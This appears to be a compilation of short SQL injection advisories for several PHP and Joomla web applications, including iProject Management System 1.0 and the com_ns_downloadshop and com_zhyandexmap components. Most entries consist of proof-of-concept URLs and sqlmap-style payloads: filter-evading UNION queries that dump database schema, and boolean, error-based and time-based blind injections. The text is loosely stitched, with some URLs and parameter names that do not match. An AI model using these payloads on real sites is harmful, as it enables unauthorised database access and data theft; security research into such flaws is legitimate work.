The vulnerability allows users to inject SQL commands into the iProject Management System 1.0 application.
The vulnerability allows users to upload arbitrary files to the web server.
The vulnerability allows an attacker to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
    -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+-
    http://localhost/[PATH]/service-provider.php?ser=[SQL]
    -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
    Parameter: sc (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH
        Type: UNION query
        Title: Generic UNION query (NULL) - 10 columns
        Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
The vulnerability allows an attacker to inject SQL commands. An attacker can send a malicious payload to the 'nice_theme' parameter to execute a boolean-based blind or AND/OR time-based blind attack. The payloads can be 'nice_theme=2 AND 9686=9686' or 'nice_theme=2 AND SLEEP(5)'.
The vulnerability allows an attacker to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL]
    Parameter: id (GET)
        Type: boolean-based blind
        Title: MySQL >= 5.0 boolean-based blind - Parameter replace
        Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))
        Type: error-based
        Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
        Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
The vulnerability allows an attacker to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL]
    Parameter: placemarklistid (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013#
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
The vulnerability allows users to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL]
    -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+-
    http://localhost/[PATH]/admin/template/?edit=[SQL]
The vulnerability allows an attacker to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL]
    1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
    Parameter: subcategory (GET)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: subcategory=1' OR SLEEP(5)-- RvzR
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameters of the application. The vulnerable parameters are search/tag, friends/index, users/profile and video_catalog/category. The payloads used to exploit the vulnerability are: AND boolean-based blind - WHERE or HAVING clause; MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR); MySQL >= 5.0.12 AND time-based blind; and Generic UNION query (NULL) - 3 columns.
The vulnerability allows an attacker to inject SQL commands.
    Proof of Concept:
    http://localhost/[PATH]/index.php?page=news&nid=[SQL]
    Parameter: cat (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
        Payload: cat=1' OR NOT 6616=6616#
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: cat=1' OR SLEEP(5)-- cCQQ